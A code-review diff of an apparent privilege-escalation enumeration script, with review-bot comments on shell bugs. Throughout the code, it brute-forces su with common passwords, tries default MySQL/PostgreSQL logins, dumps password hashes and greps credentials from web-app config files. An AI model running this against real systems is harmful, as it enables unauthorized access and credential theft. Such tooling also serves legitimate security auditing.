"s,$groupsB,${C}[1;31m&${C}[0m," | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$Groups,${C}[1;31;103m&${C}[0m,") || echo_not_found "/etc/polkit-1/localauthority.conf.d" + echo "" + + #-- UI) Superusers + printf $Y"[+] "$GREEN"Superusers\n"$NC + awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + + #-- UI) Users with console + printf $Y"[+] "$GREEN"Users with console\n"$NC + if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` + if [ "`grep \"$ushell\" /etc/shells`" ]; then #Shell user + dscl . 
-read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + fi + done + else + no_shells="`cat /etc/passwd 2>/dev/null | grep -Ev "sh$" | cut -d ":" -f 7 | sort | uniq`" + unexpected_shells="" + printf "$no_shells\n" | while read f; do + if [ "`$f -c 'whoami' 2>/dev/null | grep \"$(whoami)\"`" ]; then + unexpected_shells="$f\n$unexpected_shells" + fi + done + cat /etc/passwd 2>/dev/null | grep "sh$" | sort | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + if [ "$unexpected_shells" ]; then + echo "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,g" + echo "Unexpected users with shells:" + printf "$unexpected_shells\n" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,g" + fi + done + fi + fi + echo "" + + #-- UI) All users & groups + printf $Y"[+] "$GREEN"All users & groups\n"$NC + if [ "$MACPEAS" ]; then + dscl . 
list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" + else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" + fi + echo "" + + #-- UI) Login now + printf $Y"[+] "$GREEN"Login now\n"$NC + (w || who || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + + #-- UI) Last logons + printf $Y"[+] "$GREEN"Last logons\n"$NC + (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + + #-- UI) Login info + printf $Y"[+] "$GREEN"Last time logon each user\n"$NC + lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + + #-- UI) Password policy + printf $Y"[+] "$GREEN"Password policy\n"$NC + grep 
"^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" echo "" #-- UI) Brute su - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then + EXISTS_SUDO="`command -v sudo 2>/dev/null`" + if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then printf $Y"[+] "$GREEN"Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC POSSIBE_SU_BRUTE=`check_if_su_brute`; if [ "$POSSIBE_SU_BRUTE" ]; then 
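Review bot: In the Users with console hunk `unexpected_shells` is assigned inside `printf "$no_shells\n" | while read f; do ...; done`, which runs in a subshell, so the variable is always empty afterwards and the whole `if [ "$unexpected_shells" ]` report is dead code. Capture the loop's output instead: `unexpected_shells=$(printf "$no_shells\n" | while read f; do if [ "$($f -c 'whoami' 2>/dev/null | grep "$(whoami)")" ]; then printf '%s\n' "$f"; fi; done)`. That same loop executes every non-`sh` path found in the passwd shell field with `-c 'whoami'`; on some systems that field names things like `/sbin/shutdown` or `/sbin/halt`, and running those as root is not side-effect-free, so skipping non-regular or non-executable entries (`[ -x "$f" ] || continue`) and a short comment on the risk would be prudent. The new `EXISTS_SUDO` gate on the `su` brute-force test is not obviously related to `su`; a comment stating why `check_if_su_brute` (defined outside this hunk) needs sudo would help.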
@@ -1484,55 +1680,6 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then fi printf $Y"[+] "$GREEN"Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC echo "" - - #-- UI) Superusers - printf $Y"[+] "$GREEN"Superusers\n"$NC - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - echo "" - - #-- UI) Users with console - printf $Y"[+] "$GREEN"Users with console\n"$NC - if [ "$MACPEAS" ]; then - dscl . list /Users | while read uname; do - ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` - if [ "`grep \"$ushell\" /etc/shells`" ]; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - echo "" - fi - done - else - cat /etc/passwd 2>/dev/null | grep "sh$" | sort | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - fi - echo "" - - #-- UI) All users & groups - printf $Y"[+] "$GREEN"All users & groups\n"$NC - if [ "$MACPEAS" ]; then - dscl . 
list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -E "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$knw_grps,${C}[1;32m&${C}[0m,g" - else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -E "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$knw_grps,${C}[1;32m&${C}[0m,g" - fi - echo "" - - #-- UI) Login now - printf $Y"[+] "$GREEN"Login now\n"$NC - w 2>/dev/null | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - echo "" - - #-- UI) Last logons - printf $Y"[+] "$GREEN"Last logons\n"$NC - last 2>/dev/null | tail | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - echo "" - - #-- UI) Login info - printf $Y"[+] "$GREEN"Last time logon each user\n"$NC - lastlog 2>/dev/null | grep -v "Never" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - echo "" - - #-- UI) Password policy - printf $Y"[+] "$GREEN"Password policy\n"$NC - grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" - echo "" echo "" if [ 
"$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi @@ -1542,7 +1689,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then ########################################### #--------) Software Information (---------# ########################################### - printf $B"===================================( "$GREEN"Software Information"$B" )===================================\n"$NC + printf $B"═══════════════════════════════════╣ "$GREEN"Software Information"$B" ╠═══════════════════════════════════\n"$NC #-- SI) Mysql version printf $Y"[+] "$GREEN"MySQL version\n"$NC @@ -1553,8 +1700,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf $Y"[+] "$GREEN"MySQL connection using default root/root ........... "$NC mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null` if [ "$mysqlconnect" ]; then - echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," - mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi @@ -1562,8 +1709,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf $Y"[+] "$GREEN"MySQL connection using root/toor ................... "$NC mysqlconnect=`mysqladmin -uroot -ptoor version 2>/dev/null` if [ "$mysqlconnect" ]; then - echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," - mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi 
@@ -1571,32 +1718,32 @@ if [ "`echo $CHECKS | grep SofI`" ]; then mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null` printf $Y"[+] "$GREEN"MySQL connection using root/NOPASS ................. "$NC if [ "$mysqlconnectnopass" ]; then - echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," - mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi #-- SI) Mysql credentials printf $Y"[+] "$GREEN"Searching mysql credentials and exec\n"$NC - mysqldirs=$(echo "$FIND_DIR_ETC $FIND_DIR_USR $FIND_DIR_VAR" | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -v "mysql/mysql") + mysqldirs=$(echo "$FIND_DIR_ETC\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_MNT" | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -v "mysql/mysql") if [ "$mysqldirs" ]; then printf "$mysqldirs\n" | while read d; do for f in `find $d -name debian.cnf 2>/dev/null`; do if [ -r $f ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "We can read the mysql debian.cnf. 
You can use this username/password to log in MySQL" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," cat "$f" fi done for f in `find $d -name user.MYD 2>/dev/null`; do if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" fi done for f in `grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"`; do if [ -r "$f" ]; then u=`cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null` - echo "From '$f' Mysql user: $u" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," fi done for f in `find $d -name my.cnf 2>/dev/null`; do @@ -1608,7 +1755,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then mysqlexec=`whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so"` if [ "$mysqlexec" ]; then echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," fi done else echo_not_found 
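Review bot: The rewritten `mysqldirs=$(echo "$FIND_DIR_ETC\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_MNT" | grep -E ...)` relies on the shell's builtin `echo` expanding `\n`; that holds for dash/busybox but not for bash, where the `\n` stays literal, the four lists become one line, `grep -E` accepts or rejects that line as a unit and `mysqldirs` ends up holding either every directory or nothing (the later `printf "$mysqldirs\n"` then re-splits it, so the loop still runs, just over the wrong set). Unless the script's shebang guarantees a `\n`-expanding echo, use `printf '%s\n' "$FIND_DIR_ETC" "$FIND_DIR_USR" "$FIND_DIR_VAR" "$FIND_DIR_MNT" | grep -E ...`, which is portable. The same construction is introduced for `postgdb`/`postgconfs`, `sitesenabled`/`default00`, `phpsess2`, `wp`/`drup`/`moo`/`tomcat`/`mongos` and `supervisorf`/`cesi`/`rsyncd`/`hostapd` in the following hunks. The enclosing `SofI` block starts outside this hunk.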
@@ -1618,15 +1765,15 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) PostgreSQL info printf $Y"[+] "$GREEN"PostgreSQL version and pgadmin credentials\n"$NC postgver=`psql -V 2>/dev/null` - postgdb=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'pgadmin.*\.db$') - postgconfs=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$') + postgdb=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'pgadmin.*\.db$') + postgconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$') if [ "$postgver" ] || [ "$postgdb" ] || [ "$postgconfs" ]; then if [ "$postgver" ]; then echo "Version: $postgver"; fi - if [ "$postgdb" ]; then echo "PostgreSQL database: $postgdb" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi + if [ "$postgdb" ]; then echo "PostgreSQL database: $postgdb" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi printf "$postgconfs\n" | while read f; do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,auth|password|md5|user=|pass=|trust,${C}[1;31m&${C}[0m," 2>/dev/null + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${C}[1;31m&${C}[0m," 2>/dev/null echo "" fi done 
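Review bot: The new `postgdb` and `postgconfs` lists drop `$FIND_ROOT` and `$FIND_USERS` that the old lines searched, so unless those trees are now folded into `$FIND_HOME` (not visible here) pgadmin databases and pg_hba/postgresql.conf files under `/root` and macOS `/Users` are no longer found. The same omission appears in the later `default00`, `wp`/`drup`/`moo`/`tomcat`/`mongos`, `supervisorf`/`cesi`/`rsyncd` and `hostapd` lists, while `sitesenabled` in the Apache hunk still keeps `$FIND_DIR_USERS`, which reads as an inconsistency rather than a deliberate choice. If it is intentional, a single comment where the lists are first built, `# FIND_ROOT/FIND_USERS omitted: covered by FIND_HOME`, would settle it.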
@@ -1638,7 +1785,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using postgres/NOPASS ........ "$NC - if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi @@ -1648,12 +1795,12 @@ if [ "`echo $CHECKS | grep SofI`" ]; then fi printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using pgsql/NOPASS ........... "$NC - if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi printf $Y"[+] "$GREEN"PostgreSQL connection to template1 using pgsql/NOPASS ........... "$NC - if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi echo "" 
@@ -1664,11 +1811,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null` if [ "$apachever" ]; then echo "Version: $apachever" - sitesenabled=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep "sites-enabled") + sitesenabled=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep "sites-enabled") printf "$sitesenabled\n" | while read d; do for f in "$d/*"; do grep "AuthType\|AuthName\|AuthUserFile\|ServerName\|ServerAlias" $f 2>/dev/null | grep -v "#" | sed "s,Auth|ServerName|ServerAlias,${C}[1;31m&${C}[0m,"; done; done if [ !"$sitesenabled" ]; then - default00=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep "000-default") - printf "$default00\n" | while read f; do grep "AuthType\|AuthName\|AuthUserFile\|ServerName\|ServerAlias" "$f" 2>/dev/null | grep -v "#" | sed -E "s,Auth|ServerName|ServerAlias,${C}[1;31m&${C}[0m,"; done + default00=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep "000-default") + printf "$default00\n" | while read f; do grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" "$f" 2>/dev/null | grep -v "#" | sed -${E} "s,Auth|ServerName|ServerAlias,${C}[1;31m&${C}[0m,"; done fi echo "PHP exec extensions" grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null 
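Review bot: The rewritten `default00` fallback sits inside `if [ !"$sitesenabled" ]; then`, and with no space after `!` the test sees a single non-empty string (`!` followed by the value), so it is always true and the 000-default search runs even when sites-enabled directories were found; it should read `if [ ! "$sitesenabled" ]; then`. The sites-enabled loop just above it uses `for f in "$d/*"`, where the quoted glob never expands, so `grep` is handed the literal `.../*` and reports nothing; `for f in "$d"/*` is intended. That same line also runs `sed "s,Auth|ServerName|ServerAlias,..."` without `-${E}`, so the `|` is literal and nothing is highlighted, unlike the corrected `default00` line. These are context lines, but the hunk's new logic only does useful work once they are fixed.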
@@ -1678,7 +1825,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) PHP cookies files phpsess1=`ls /var/lib/php/sessions 2>/dev/null` - phpsess2=$(echo "$FIND_TMP $FIND_VAR" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*') + phpsess2=$(echo "$FIND_TMP\n$FIND_VAR\n$FIND_MNT" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*') printf $Y"[+] "$GREEN"Searching PHPCookies\n"$NC if [ "$phpsess1" ] || [ "$phpsess2" ]; then if [ "$phpsess1" ]; then ls /var/lib/php/sessions 2>/dev/null; fi 
@@ -1689,42 +1836,60 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Wordpress user, password, databname and host printf $Y"[+] "$GREEN"Searching Wordpress wp-config.php files\n"$NC - wp=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'wp-config\.php$') + wp=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'wp-config\.php$') if [ "$wp" ]; then - echo "wp-config.php files found:\n$wp" - prtinf "$wp\n" | while read f; do grep "PASSWORD\|USER\|NAME\|HOST" "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done + printf "$wp\n" | while read f; do echo "$f"; grep -E "PASSWORD|USER|NAME|HOST" "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; echo ""; done else echo_not_found "wp-config.php" fi echo "" #-- SI) Drupal user, password, databname and host printf $Y"[+] "$GREEN"Searching Drupal settings.php files\n"$NC - drup=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'settings\.php$') - if [ "`echo $drup | grep '/default/settings.php'`" ]; then #Check path /default/settings.php - echo "settings.php files found:\n$drup" - printf "$drup\n" | while read f; do grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" $f 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done + drup=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'settings\.php$') + if [ "$drup" ]; then + printf "$drup\n" | while read f; do + if [ "`echo $f | grep '/default/settings.php'`" ]; then #Check path /default/settings.php + printf "Drupal settings.php file found: $f\n" + grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" $f 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; 
+ echo "" + fi + done else echo_not_found "/default/settings.php" fi echo "" + #-- SI) Moodle user, password, databname and host + printf $Y"[+] "$GREEN"Searching Moodle config.php files\n"$NC + moo=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'config\.php$') + if [ "$moo" ]; then + printf "$moo\n" | while read f; do + if [ "`echo $f | grep -i moodle/config.php`" ]; then + printf "Moodle config.php file found: $f\n" + grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" $f 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; + fi + done + else echo_not_found "config.php inside a moodle folder" + fi + echo "" + #-- SI) Tomcat users printf $Y"[+] "$GREEN"Searching Tomcat users file\n"$NC - tomcat=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'tomcat-users\.xml$') + tomcat=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'tomcat-users\.xml$') if [ "$tomcat" ]; then echo "tomcat-users.xml file found: $tomcat" - printf "$tomcat\n" | while read f; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; done + printf "$tomcat\n" | while read f; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; done else echo_not_found "tomcat-users.xml" fi echo "" #-- SI) Mongo Information printf $Y"[+] "$GREEN"Mongo information\n"$NC - mongos=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'mongod.*\.conf$') + mongos=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'mongod.*\.conf$') (mongo --version 